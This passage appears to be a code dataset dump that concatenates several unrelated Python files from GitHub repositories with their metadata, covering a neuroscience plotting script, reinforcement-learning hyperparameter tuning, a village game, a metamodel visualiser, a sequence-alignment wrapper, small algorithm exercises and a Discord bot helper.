mice had a third intermediate bandwidth\n\n accuracies = [wtAccuracy, PVCHR2accuracy, PVARCHTaccuracy, SOMARCHTaccuracy]\n colours = [wtColour, PVCHR2Colour, PVColour, SOMColour]\n labels = ['wild-type', 'PV::ChR2', 'PV::ArchT', 'SOM::ArchT']\n\n axScatter = plt.subplot(gs[0,2])\n\n barWidth = 0.2\n barLoc = np.array([-0.22, 0.22])\n xLocs = np.arange(4)\n xTicks = []\n xTickLabels = possibleBands[bandsToUse]\n\n for indType, accuracyData in enumerate(accuracies):\n edgeColour = matplotlib.colors.colorConverter.to_rgba(colours[indType], alpha=0.5)\n\n thisxLocs = barLoc + xLocs[indType]\n xTicks.extend(thisxLocs)\n\n for indMouse in range(accuracyData.shape[0]):\n plt.plot(thisxLocs, np.reshape(accuracyData[indMouse,bandsToUse],(2,1)), 'o-', color=colours[indType], alpha=0.3)\n\n median = np.median(accuracyData, axis=0)\n plt.plot(thisxLocs, median[bandsToUse], 'o-', color='k')\n\n # for indBand, band in enumerate(bandsToUse):\n # xvals = np.repeat(thisxLocs[indBand], accuracyData.shape[0])\n # jitterAmt = np.random.random(len(xvals))\n # xvals = xvals + (barWidth * jitterAmt) - barWidth / 2\n #\n # plt.plot(xvals, accuracyData[:,band], 'o', mec=edgeColour, mfc='none', clip_on=False, markeredgewidth=1.3)\n # median = np.median(accuracyData[:,band])\n # plt.plot([thisxLocs[indBand] - barWidth / 2, thisxLocs[indBand] + barWidth / 2], [median, median], '-', color='k', mec=edgeColour, lw=3)\n\n # ExPatch = patches.Patch(color=ExColor, label='Exc.')\n # PVPatch = patches.Patch(color=PVColor, label=r'PV$^+$')\n # SOMPatch = patches.Patch(color=SOMColor, label=r'SOM$^+$')\n # plt.legend(handles=[ExPatch, PVPatch, SOMPatch], frameon=False, fontsize=fontSizeLabels, loc='best')\n\n plt.ylim(45,100)\n plt.xlim(xTicks[0] - 0.3, xTicks[-1] + 0.3)\n plt.ylabel('Accuracy (%)')\n plt.xlabel('Masker bandwidth (octaves)')\n axScatter.set_xticks(xTicks)\n axScatter.set_xticklabels(np.tile(xTickLabels,len(xTicks)//2))\n extraplots.boxoff(axScatter)\n\nif PANELS[2]:\n dataFullPath = os.path.join(dataDir, fileName)\n data = np.load(dataFullPath)\n\n PVCHR2bias = data['PVCHR2biasByBand']\n PVARCHTbias = data['PVARCHTbiasByBand']\n SOMARCHTbias = data['SOMARCHTbiasByBand']\n wtBias = data['wtBiasByBand']\n\n possibleBands = data['possibleBands']\n bandsToUse = [0,-1] # using first and last bands because PV-ChR2 mice had a third intermediate bandwidth\n\n biases = [wtBias, PVCHR2bias, PVARCHTbias, SOMARCHTbias]\n colours = [wtColour, PVCHR2Colour, PVColour, SOMColour]\n labels = ['wild-type', 'PV::ChR2', 'PV::ArchT', 'SOM::ArchT']\n\n axScatter = plt.subplot(gs[1,2])\n\n barWidth = 0.2\n barLoc = np.array([-0.22, 0.22])\n xLocs = np.arange(4)\n xTicks = []\n xTickLabels = possibleBands[bandsToUse]\n\n for indType, biasData in enumerate(biases):\n edgeColour = matplotlib.colors.colorConverter.to_rgba(colours[indType], alpha=0.5)\n\n thisxLocs = barLoc + xLocs[indType]\n xTicks.extend(thisxLocs)\n\n for indMouse in range(biasData.shape[0]):\n plt.plot(thisxLocs, np.reshape(biasData[indMouse,bandsToUse],(2,1)), 'o-', color=colours[indType], alpha=0.3)\n\n median = np.median(biasData, axis=0)\n plt.plot(thisxLocs, median[bandsToUse], 'o-', color='k')\n\n # ExPatch = patches.Patch(color=ExColor, label='Exc.')\n # PVPatch = patches.Patch(color=PVColor, label=r'PV$^+$')\n # SOMPatch = patches.Patch(color=SOMColor, label=r'SOM$^+$')\n # plt.legend(handles=[ExPatch, PVPatch, SOMPatch], frameon=False, fontsize=fontSizeLabels, loc='best')\n\n plt.ylim(-1,1)\n plt.xlim(xTicks[0] - 0.3, xTicks[-1] + 0.3)\n plt.ylabel('Bias')\n plt.xlabel('Masker bandwidth (octaves)')\n axScatter.set_xticks(xTicks)\n axScatter.set_xticklabels(np.tile(xTickLabels,len(xTicks)//2))\n extraplots.boxoff(axScatter)\n\nif SAVE_FIGURE:\n extraplots.save_figure(figFilename, figFormat, figSize, outputDir)\n\n#plt.show()\n","repo_name":"sjara/jaratest","sub_path":"common/2020acsigdet/extras/supplement_figure_behav_performance_by_strain.py","file_name":"supplement_figure_behav_performance_by_strain.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3480145736","text":"import os\nimport sys\nfrom functools import partial\nimport numpy as np\nimport yaml\nfrom pathlib import Path\n\nimport ray\nfrom ray import tune\nfrom ray.tune.schedulers.pb2 import PB2\n\nfrom stable_baselines3 import PPO, DDPG\nfrom stable_baselines3.common.env_util import make_vec_env\nfrom stable_baselines3.common.vec_env import VecNormalize\n\nfrom src.utils.hyperparameter_processing import preprocess_hyperparams\nfrom src.train import get_parser\nfrom src.context.sampling import sample_contexts\n\n\ndef setup_model(env, num_envs, hide_context, context_feature_args, default_sample_std_percentage, config, checkpoint_dir):\n hyperparams = {}\n env_wrapper = None\n num_contexts = 100\n contexts = sample_contexts(\n env,\n context_feature_args,\n num_contexts,\n default_sample_std_percentage=default_sample_std_percentage\n )\n env_logger = None\n from src.envs import CARLPendulumEnv, CARLBipedalWalkerEnv, CARLLunarLanderEnv\n EnvCls = partial(\n eval(env),\n contexts=contexts,\n logger=env_logger,\n hide_context=hide_context,\n )\n env = make_vec_env(EnvCls, n_envs=1, wrapper_class=env_wrapper)\n eval_env = make_vec_env(EnvCls, n_envs=1, wrapper_class=env_wrapper)\n\n if checkpoint_dir:\n checkpoint_dir = str(checkpoint_dir)\n checkpoint = os.path.join(checkpoint_dir, \"checkpoint\")\n model = PPO.load(checkpoint, env=env)\n else:\n model = PPO('MlpPolicy', env, **config)\n return model, eval_env\n\n\ndef eval_model(model, eval_env, config):\n eval_reward = 0\n for i in range(100):\n done = False\n state = eval_env.reset()\n while not done:\n action, _ = model.predict(state)\n state, reward, done, _ = eval_env.step(action)\n eval_reward += reward\n return eval_reward / 100\n\n\ndef train_ppo(env, num_envs, hide_context, context_feature_args, default_sample_std_percentage, config, checkpoint_dir=None):\n model, eval_env = setup_model(\n env=env,\n num_envs=num_envs,\n config=config,\n checkpoint_dir=checkpoint_dir,\n hide_context=hide_context,\n context_feature_args=context_feature_args,\n default_sample_std_percentage=default_sample_std_percentage\n )\n model.learning_rate = config[\"learning_rate\"]\n model.gamma = config[\"gamma\"]\n #model.tau = config[\"tau\"]\n model.ent_coef = config[\"ent_coef\"]\n model.vf_coef = config[\"vf_coef\"]\n model.gae_lambda = config[\"gae_lambda\"]\n model.max_grad_norm = config[\"max_grad_norm\"]\n\n for _ in range(100):\n model.learn(1e6)\n if checkpoint_dir:\n path = os.path.join(checkpoint_dir, \"checkpoint\")\n model.save(path)\n eval_reward = eval_model(model, eval_env, config)\n tune.report(\n mean_accuracy=eval_reward,\n current_config=config\n )\n\n\ndef run_experiment(args):\n parser = get_parser()\n parser.add_argument(\n \"--server-address\",\n type=str,\n default=None,\n required=False,\n help=\"The address of server to connect to if using \"\n \"Ray Client.\")\n parser.add_argument(\n \"--checkpoint_dir\", type=str, default=\"results/experiments/pb2\"\n )\n parser.add_argument(\"--name\", type=str, help=\"Experiment name\")\n parser.add_argument(\"--outdir\", type=str, help=\"Result directory\")\n parser.add_argument(\"--env\", type=str, help=\"Environment to optimize for\")\n parser.add_argument(\"--hide_context\", action=\"store_true\")\n parser.add_argument(\"--default_sample_std_percentage\", type=float, default=0.1)\n parser.add_argument(\"--context_feature\", type=str, help=\"Context feature to adapt\")\n\n args, unknown_args = parser.parse_known_args()\n local_dir = os.path.join(args.outdir, \"ray\")\n args.default_sample_std_percentage = 0.1\n args.context_feature_args = [args.context_feature]\n checkpoint_dir = args.checkpoint_dir\n\n # checkpoint_dir = Path(checkpoint_dir)\n # checkpoint_dir.mkdir(parents=True, exist_ok=True)\n # args.num_envs = 1\n if args.server_address:\n ray.util.connect(args.server_address)\n else:\n ray.init()\n\n print(\"current workdir:\", os.getcwd())\n\n pbt = PB2(\n perturbation_interval=1,\n hyperparam_bounds={\n 'learning_rate': [0.00001, 0.02],\n 'gamma': [0.8, 0.999],\n 'gae_lambda': [0.8, 0.999],\n 'ent_coef': [0.0, 0.5],\n 'max_grad_norm': [0.0, 1.0],\n 'vf_coef': [0.0, 1.0],\n #'tau': [0.0, 0.99]\n },\n log_config=True,\n require_attrs=True,\n )\n\n defaults = {\n 'batch_size': 128, # 1024,\n 'learning_rate': 3e-5,\n 'gamma': 0.99, # 0.95,\n }\n\n analysis = tune.run(\n partial(\n train_ppo,\n args.env,\n args.num_envs,\n args.hide_context,\n args.context_feature_args,\n args.default_sample_std_percentage\n ),\n name=args.name,\n scheduler=pbt,\n metric=\"mean_accuracy\",\n mode=\"max\",\n verbose=3,\n stop={\n \"training_iteration\": 250,\n # \"timesteps_total\": 1e6,\n },\n num_samples=8,\n fail_fast=True,\n # Search defaults from zoo overwritten with brax demo\n config=defaults,\n local_dir=local_dir,\n log_to_file=True,\n )\n\n all_dfs = analysis.trial_dataframes\n for i, (name, df) in enumerate(all_dfs.items()):\n fname = Path(os.path.join(args.outdir, f\"trail_df_{i}_{name.strip('_')}.csv\"))\n fname.parent.mkdir(parents=True, exist_ok=True)\n df.to_csv(fname)\n print(\"Best hyperparameters found were: \", analysis.best_config)\n ray.shutdown()\n\nif __name__ == '__main__':\n run_experiment(sys.argv[1:])\n","repo_name":"automl-private/cRL_HPO","sub_path":"cRL_HPO/run_pb2.py","file_name":"run_pb2.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41477404486","text":"from aitools.StateMachine import *\r\nimport GameEntity\r\nfrom gametools.vector2 import Vector2\r\nimport glob\r\n\r\nimport ImageFuncs\r\nimport pygame\r\n\r\n\r\nclass Building(GameEntity.GameEntity):\r\n def __init(self, world, name, image_string=\"Inn\"):\r\n GameEntity.__init__(self, world, name, \"Buildings/\"+image_string)\r\n\r\n self.image_funcs = ImageFuncs(32, 32, pygame.image.load(\"Images/Buildings/TotalImage.png\"))\r\n self.tile_x, self.tile_y = pos\r\n self.cost = 100\r\n get_images(name)\r\n \r\n self.can_drop_food = False\r\n self.can_drop_wood = False\r\n\r\n\r\nclass LumberYard(Building):\r\n def __init__(self, world, image_string=\"LumberYard\"):\r\n Building.__init__(self, world, \"Lumber Yard\", image_string)\r\n\r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 2)\r\n self.Held = 0\r\n self.HeldMax = 50\r\n self.cost = 100\r\n\r\n self.world.MAXwood += self.HeldMax\r\n self.can_drop_wood = True\r\n\r\n\r\nclass Dock(Building):\r\n \r\n def __init__(self, world, image_string=\"Dock\"):\r\n Building.__init__(self, world, \"Dock\", image_string)\r\n\r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 0)\r\n\r\n self.Held = 0\r\n self.HeldMax = 25\r\n self.cost = 150\r\n \r\n self.can_drop_food = True\r\n\r\n self.world.MAXfood += self.HeldMax\r\n \r\nclass House(Building):\r\n def __init__(self, world, image_string=\"House\"):\r\n Building.__init__(self, world, \"House\", image_string)\r\n\r\n self.supports = 5\r\n self.cost = 30\r\n\r\n self.world.MAXpopulation += self.supports\r\n\r\n\r\nclass Manor(Building):\r\n def __init__(self, world, image_string=\"Manor\"):\r\n Building.__init__(self, world, \"Manor\", image_string)\r\n\r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 4)\r\n\r\n self.supports = 15\r\n self.cost = 100\r\n\r\n self.world.MAXpopulation += self.supports\r\n \r\nclass TownCenter(Building):\r\n def __init__(self, world, image_string=\"Manor\"):\r\n Building.__init__(self, world, \"Town Center\", image_string)\r\n \r\n self.image = self.image_funcs.get_irregular_image(2, 2, 2, 6)\r\n\r\n self.can_drop_food = True\r\n self.can_drop_wood = True\r\n \r\n self.supports = 15\r\n self.cost = 500\r\n \r\n self.world.MAXpopulation += self.supports\r\n self.world.MAXWood += 50\r\n self.world.MAXFood += 50\r\n\r\n\r\nclass UnderConstruction(Building):\r\n def __init__(self, world, image_string, will_be):\r\n Building.__init__(self, world, \"Under Construction\", image_string)\r\n self.will_be = will_be\r\n self.ttb = 30.0\r\n self.max_ttb = 30.0\r\n\r\n def create(self):\r\n self.world.add_built(self.will_be, self.location)\r\n self.world.remove_entity(self)\r\n\r\n\r\nclass StoreShed(Building):\r\n\r\n def __init__(self, world, image_string):\r\n Building.__init__(self, world, \"Store Shed\", image_string)\r\n","repo_name":"najarvis/villager-sim","sub_path":"Buildings.py","file_name":"Buildings.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"4082256506","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import RadioButtons\nfrom matplotlib.widgets import Slider\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\nclass VisualizeMetamodel:\n \"\"\"\n Class that contains functions to visualize a metamodel. At least the metamodel as well as the boundaries of the\n visualization have to be parametrizes in its designated setter functions. By executing the plot_metamodel function,\n an matplotlib plot is generated, where the plane of observation can be selected by setting radio buttons and\n sliders.\n \"\"\"\n def __init__(self):\n self._metamodel = None\n self._bounds = None\n self._points_per_axis = 100\n self._current_values = []\n self._x_axis_num = 0\n self._y_axis_num = 1\n self._c_levels = 100\n self._eq_lines = 10\n self._num_doe_points = None\n\n @property\n def metamodel(self):\n return self._metamodel\n\n @metamodel.setter\n def metamodel(self, model):\n self._metamodel = model\n\n @property\n def bounds(self):\n return self._bounds\n\n @bounds.setter\n def bounds(self, array):\n self._bounds = array\n\n @property\n def points_per_axis(self):\n return self._points_per_axis\n\n @points_per_axis.setter\n def points_per_axis(self, number):\n self._points_per_axis = number\n\n @property\n def current_values(self):\n return self._current_values\n\n @current_values.setter\n def current_values(self, values):\n self._current_values = values\n\n @property\n def x_axis_num(self):\n return self._x_axis_num\n\n @x_axis_num.setter\n def x_axis_num(self, number):\n self._x_axis_num = number\n\n @property\n def y_axis_num(self):\n return self._y_axis_num\n\n @y_axis_num.setter\n def y_axis_num(self, number):\n self._y_axis_num = number\n\n @property\n def c_levels(self):\n return self._c_levels\n\n @c_levels.setter\n def c_levels(self, number):\n self._c_levels = number\n\n @property\n def eq_lines(self):\n return self._eq_lines\n\n @eq_lines.setter\n def eq_lines(self, number):\n self._eq_lines = number\n\n @property\n def num_doe_points(self):\n return self._num_doe_points\n\n @num_doe_points.setter\n def num_doe_points(self, number):\n self._num_doe_points = number\n\n def plot_metamodel(self):\n \"\"\"\n Creates a plot showing one plane of the metamodel. The plane can be changed by selecting radio buttons. The\n other parameters are constant and can be set via sliders on the plot. \n \"\"\"\n fig, ax = plt.subplots()\n\n plt.subplots_adjust(left=0.15)\n plt.subplots_adjust(bottom=0.1 + 0.05 * self.bounds.shape[0])\n\n cax = make_axes_locatable(ax).append_axes(\"right\", size=\"5%\", pad=\"2%\")\n\n linspaces = []\n for bound in self.bounds:\n linspaces.append(np.linspace(bound[0], bound[1], self.points_per_axis))\n self.current_values.append(np.average(bound))\n\n def replot():\n plot_points = [None] * self.bounds.shape[0]\n for i, bound in enumerate(self.bounds):\n if i == min(self.x_axis_num, self.y_axis_num):\n x_coords, y_coords = np.meshgrid(linspaces[self.x_axis_num], linspaces[self.y_axis_num])\n\n plot_points[self.x_axis_num] = x_coords.reshape(-1)\n plot_points[self.y_axis_num] = y_coords.reshape(-1)\n\n elif i == max(self.x_axis_num, self.y_axis_num):\n continue\n\n else:\n plot_points[i] = self.current_values[i] * np.ones(\n [self.points_per_axis, self.points_per_axis]).reshape(-1)\n\n plot_points = np.array(plot_points).T\n\n sm_result = self.metamodel.predict_values(plot_points)\n\n ax.clear()\n\n im = ax.contourf(plot_points[:, self.x_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n plot_points[:, self.y_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n sm_result.reshape(self.points_per_axis, self.points_per_axis), self.c_levels)\n\n ax.contour(plot_points[:, self.x_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n plot_points[:, self.y_axis_num].reshape(self.points_per_axis, self.points_per_axis),\n sm_result.reshape(self.points_per_axis, self.points_per_axis), self.eq_lines, colors=\"black\")\n\n images = []\n\n if False:\n images.append(ax.plot(self.metamodel.training_points[None][0][0][self.num_doe_points:][:,self.x_axis_num],\n self.metamodel.training_points[None][0][0][self.num_doe_points:][:,self.y_axis_num], \"rx\"))\n\n images.append(ax.plot(self.metamodel.training_points[None][0][0][:self.num_doe_points][:,self.x_axis_num],\n self.metamodel.training_points[None][0][0][:self.num_doe_points][:,self.y_axis_num], \"bx\"))\n\n y_opt = min(self.metamodel.training_points[None][0][1])\n x_opt = self.metamodel.training_points[None][0][0][self.metamodel.training_points[None][0][1].tolist().index(y_opt)]\n\n images.append(ax.plot(x_opt[self.x_axis_num], x_opt[self.y_axis_num], \"gx\"))\n\n\n #images.append(ax.plot(self.))\n\n # images.append(ax.grid())\n\n cax.clear()\n\n fig.colorbar(im, cax=cax)\n\n plt.show()\n\n def update(val):\n current_values = []\n for slider in sliders:\n current_values.append(slider.val)\n\n self.current_values = current_values\n\n replot()\n\n sliders = []\n for i, bound in enumerate(self.bounds):\n sliders.append(\n Slider(\n ax=plt.axes([0.25, 0.05 + 0.05 * i, 0.65, 0.03]),\n label=\"parameter_\" + str(i),\n valmin=bound[0],\n valmax=bound[1],\n valinit=np.average(bound)\n )\n )\n sliders[-1].on_changed(update)\n\n axis_numbers = list(range(0, self.bounds.shape[0]))\n axis_numbers_str = [\"parameter_\" + str(i) for i in axis_numbers]\n axis_dict = dict(zip(axis_numbers_str, axis_numbers))\n\n rax = plt.axes([0.05, 0.7, 0.075, 0.15])\n x_radio = RadioButtons(rax, tuple(axis_numbers_str))\n\n def x_axis(label):\n self.x_axis_num = axis_dict[label]\n replot()\n\n x_radio.on_clicked(x_axis)\n\n rax = plt.axes([0.05, 0.4, 0.075, 0.15])\n y_radio = RadioButtons(rax, tuple(axis_numbers_str))\n\n def y_axis(label):\n self.y_axis_num = axis_dict[label]\n replot()\n\n y_radio.on_clicked(y_axis)\n y_radio.set_active(self.y_axis_num)\n\n plt.show()\n\nif __name__ == \"__main__\":\n import smt.sampling_methods as sampling\n import smt.surrogate_models as smt\n\n def get_sm(fun, bounds, doe_num):\n doe = sampling.LHS(xlimits=bounds)\n x_0 = doe(doe_num)\n y_0 = fun(*tuple([x_0[:, i] for i in range(bounds.shape[0])]))\n\n sm = smt.RBF(d0=5)\n sm.set_training_values(x_0, y_0)\n sm.train()\n\n return (sm)\n\n\n def fun(x, y, z, a):\n return x ** 2 + y ** 2 + (x * z) ** 2 + y+ z + np.sin(a)\n\n\n bounds = np.array([[-1, 1], [0, 2], [2, 6], [0,50]])\n sm = get_sm(fun, bounds, 50)\n\n vis = VisualizeMetamodel()\n vis.bounds = bounds\n vis.metamodel = sm\n vis.num_doe_points = 25\n vis.points_per_axis = 100\n\n vis.plot_metamodel()\n","repo_name":"hbrs-cse/treeopt","sub_path":"treeopt/visualize2.py","file_name":"visualize2.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"24788163017","text":"#! /usr/bin/env python3\n\n#Michiel Merx and Inne Lemstra 2017-01-24\n#Not working still under construction\nimport subprocess\nimport time\n\ndef benchmark(outputPreStep, shortReads):\n\toutput = \"../test_data/Soap2_alignment_paired.sam\"\n\t\n\tstartTime = time.time()\n\tdebug = go(outputPreStep, shortReads, output)\n\tendTime = time.time()\n\t\n\tbmAlign = endTime - startTime\n\treturn([bmAlign, debug])\n\ndef go(indexOutputPath, shortReadspath, alignOutputPath):\n\tcomAlign = \"soap -a {1} {2} -D {0} -o {3}\"\\\n\t\t.format(indexOutputPath, shortReadspath[0],\\\n\t\t\t shortReadspath[1], alignOutputPath)\n\tdebug = subprocess.call([\"/bin/bash\", \"-i\", \"-c\", comAlign])\n\treturn(debug)\n\nif __name__ == \"main\":\n\tindexOutputPath = \"./index_files/index_ecoli\"\n\tshortReadpath = \"./sra_set.fasta\"\n\talginOutputPath = \"./alignments/ecoli\"\n\tdebug = go(indexOutputPath, shortReadpath, alginOutputPath)\n","repo_name":"MWJMerkx/pcfb_project","sub_path":"client/sra_modules/soap2Align.py","file_name":"soap2Align.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20614991131","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport shutil\nimport tempfile\n\nimport keras\nimport pytest\n\nSPEC_FILES = [\n 'default_spec.txt',\n]\n\n\n@pytest.mark.script_launch_mode('subprocess')\n@pytest.mark.slow\n@pytest.mark.parametrize('_spec_file', SPEC_FILES)\ndef test_train(script_runner, tmpdir, _spec_file):\n '''Test the train script.'''\n keras.backend.clear_session()\n keras.backend.set_learning_phase(1)\n script = 'nvidia_tao_tf1/cv/retinanet/scripts/train.py'\n env = os.environ.copy()\n parent_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n spec_file = os.path.join(parent_dir, 'experiment_specs', _spec_file)\n temp_dir_name = tempfile.mkdtemp()\n\n args = ['-e']\n args.append(spec_file)\n args.append('-k')\n args.append('nvidia_tlt')\n args.append('-r')\n args.append(temp_dir_name)\n ret = script_runner.run(script, env=env, *args)\n try:\n assert ret.success\n shutil.rmtree(temp_dir_name)\n except AssertionError:\n print(\"Local path is not ready.\")\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/retinanet/scripts/tests/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"43426336495","text":"def subset(s, n, arr=[]):\n def sub(s, n, arr=[]):\n if n:\n return sub(s[:n-1] + s[n:], n-1, arr + [s])\n else: return arr\n if n:\n return subset([s[-1]] + s[:-1], n-1, arr + sub(s, len(s)))\n else: return arr\n\n\ndef subset2(nums):\n if not nums: return [[]]\n out = []\n \n def sub(nums, p):\n if nums:\n sub(nums[1:], p + [nums[0]])\n sub(nums[1:], p)\n else: out.append(p)\n sub(nums, [])\n return out\n\ndef subset3(arr):\n n = len(arr)\n if n == 0:\n return []\n if n == 1:\n return [arr]\n\n subs = []\n\n for i in range(n):\n m = arr[i]\n subs.append([m])\n remainder = arr[i+1:]\n for sub in subset3(remainder):\n subs.append([m] + sub)\n return subs\n\nprint(subset([1,2,3], 3))\nprint(subset2([1,2,3]))\nprint(subset3([1,2,3]))\n","repo_name":"ethan-haynes/coding-problems","sub_path":"python/src/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10449688262","text":"import pyqrcode \nimport png \nfrom pyqrcode import QRCode \n\n# open file\nfile = open('qrData','r')\narr = file.readlines()\n\nfor id,item in enumerate(arr):\n # delete \\n\n s = item[:-1]\n \n name = 'qr/myqr'+str(id+1)+'.png'\n pyqrcode.create(s).png(name,scale = 10)\n print(name)\n\n# contoh file qrData\n# 883427597189\n# 883427597189\n# 883427597189\n","repo_name":"OmahTI-UGM/HacktoberFest2020","sub_path":"Python/qrPokemon.py","file_name":"qrPokemon.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20190345039","text":"from C4Env import C4Env\nimport time\n\nenv = C4Env()\nfor i_episode in range(2):\n observation = env.reset()\n done = False\n while not done:\n action = env.random_move()\n env.render()\n observation, reward, done, info = env.step(action)\n","repo_name":"Louis-Bagot/AtariRL","sub_path":"c4/env_tester.py","file_name":"env_tester.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35447982104","text":"# -*- coding: utf-8 -*-\n\"\"\"\n剑指 Offer 37. 序列化二叉树\n请实现两个函数,分别用来序列化和反序列化二叉树。\n\n示例: \n\n你可以将以下二叉树:\n\n 1\n / \\\n 2 3\n / \\\n 4 5\n\n序列化为 \"[1,2,3,null,null,4,5]\"\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n 时间复杂度 O(N) : N 为二叉树的节点数,层序遍历需要访问所有节点,\n 最差情况下需要访问 N + 1 个 null ,总体复杂度为 O(2N + 1) = O(N)。\n 空间复杂度 O(N) : 最差情况下,队列 queue 同时存储 (N+1) / 2 个节点(或 N+1 个 null ),使用 O(N) ;\n 列表 res 使用 O(N) 。\n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root:\n return \"[]\"\n queue = list()\n queue.append(root)\n res = []\n while queue:\n node = queue.pop(0)\n if node:\n res.append(str(node.val))\n queue.append(node.left)\n queue.append(node.right)\n else:\n res.append(\"null\")\n while res[-1] == \"null\":\n res.pop()\n res = \"[\" + \",\".join(res) + \"]\"\n return res\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n 时间复杂度 O(N) : N 为二叉树的节点数,按层构建二叉树需要遍历整个 vals ,其长度最大为 2N+1 。\n 空间复杂度 O(N) : 最差情况下,队列 queue 同时存储 (N+1) / 2 个节点,因此使用 O(N) 额外空间。\n :type data: str\n :rtype: TreeNode\n \"\"\"\n if data == \"[]\": return\n vals, i = data[1:-1].split(','), 1\n root = TreeNode(int(vals[0]))\n queue = list()\n queue.append(root)\n while queue:\n node = queue.pop(0)\n try:\n if vals[i] != \"null\":\n node.left = TreeNode(int(vals[i]))\n queue.append(node.left)\n except IndexError:\n pass\n i += 1\n try:\n if vals[i] != \"null\":\n node.right = TreeNode(int(vals[i]))\n queue.append(node.right)\n except IndexError:\n pass\n i += 1\n return root\n\n\n# Your Codec object will be instantiated and called as such:\n# codec = Codec()\n# codec.deserialize(codec.serialize(root))\n\nif __name__ == '__main__':\n nodes = \"[1,2,3,null,null,4,5]\"\n\n codec = Codec()\n root = codec.deserialize(nodes)\n print(codec.serialize(root))\n","repo_name":"MaoningGuan/LeetCode","sub_path":"剑指 Offer(第 2 版)/serialize_deserialize.py","file_name":"serialize_deserialize.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15115837581","text":"from datetime import datetime\nfrom discord.ext import commands\nfrom helper import RankingDb\nimport json\nclass FilterError(commands.CommandError):\n pass\nclass ParamParseError(FilterError):\n pass\n\ndef time_format(seconds):\n seconds = int(seconds)\n days, seconds = divmod(seconds, 86400)\n hours, seconds = divmod(seconds, 3600)\n minutes, seconds = divmod(seconds, 60)\n return days, hours, minutes, seconds\n\n\ndef pretty_time_format(seconds):\n days, hours, minutes, seconds = time_format(seconds)\n timespec = [\n (days, 'day', 'days'),\n (hours, 'hour', 'hours'),\n (minutes, 'minute', 'minutes'),\n (seconds, 'second', 'seconds')\n ]\n timeprint = [(cnt, singular, plural) for cnt, singular, plural in timespec if cnt]\n\n def format_(triple):\n cnt, singular, plural = triple\n return f'{cnt} {singular if cnt == 1 else plural}'\n\n return ' '.join(map(format_, timeprint))\n\ndef parse_date(arg):\n try:\n if len(arg) == 8:\n fmt = '%d%m%Y'\n elif len(arg) == 6:\n fmt = '%m%Y'\n elif len(arg) == 4:\n fmt = '%Y'\n else:\n raise ValueError\n return datetime.strptime(arg, fmt)\n except ValueError:\n raise ParamParseError(f'{arg} is an invalid date argument')\n\nclass DayFilter():\n def __init__(self):\n self.low = datetime.strptime(\"2000\", \"%Y\")\n self.hi = datetime.strptime(\"3000\", \"%Y\")\n def filter(self, date):\n return self.low <= date and date < self.hi\n \n def parse(self, args):\n args = list(set(args))\n handle = None\n for arg in args:\n if arg[0:2] == 'd<':\n self.hi = min(self.hi, parse_date(arg[2:]))\n elif arg[0:3] == 'd>=':\n self.low = max(self.low, parse_date(arg[3:]))\n else:\n handle = arg\n return handle\n\nasync def get_handle(ctx, handle):\n if handle is None:\n handle = RankingDb.RankingDb.get_handle(ctx.author.id)\n if handle is None:\n await ctx.send(f'Không tìm thấy nick của {ctx.author.mention} trong dữ liệu. Xin hãy dùng command ;voj identify nick_cf')\n return None\n return handle\n else:\n handle = handle.replace('!', '')\n if handle[0] == '<' and handle[-1] == '>':\n if len(handle) <= 3 or not handle[2:-1].isdigit():\n await ctx.send(f'Handle {handle} is invalid.')\n return None\n discord_id = handle[2:-1]\n handle = RankingDb.RankingDb.get_handle(discord_id)\n if handle is None:\n await ctx.send(f'Không tìm thấy nick của <@{discord_id}> trong dữ liệu.')\n return None\n return handle\nSPOJ_CNT_AC = json.load(open('database/spoj_cnt_ac.json'))\nproblem_points = None\ndef get_problem_points(force=False):\n global problem_points\n if problem_points != None and not force:\n return problem_points\n problem_info = RankingDb.RankingDb.get_table(RankingDb.PROBLEM_TABLE)\n problem_info = list(map(lambda x: (x['name'], str(x['contestId']) + '/' + x['index'], x['cntAC']), problem_info))\n problem_points = {}\n for problem_name, links, cnt_AC in problem_info:\n name = problem_name[:problem_name.find('-')].strip()\n spoj_cnt = 0\n if name in SPOJ_CNT_AC:\n spoj_cnt 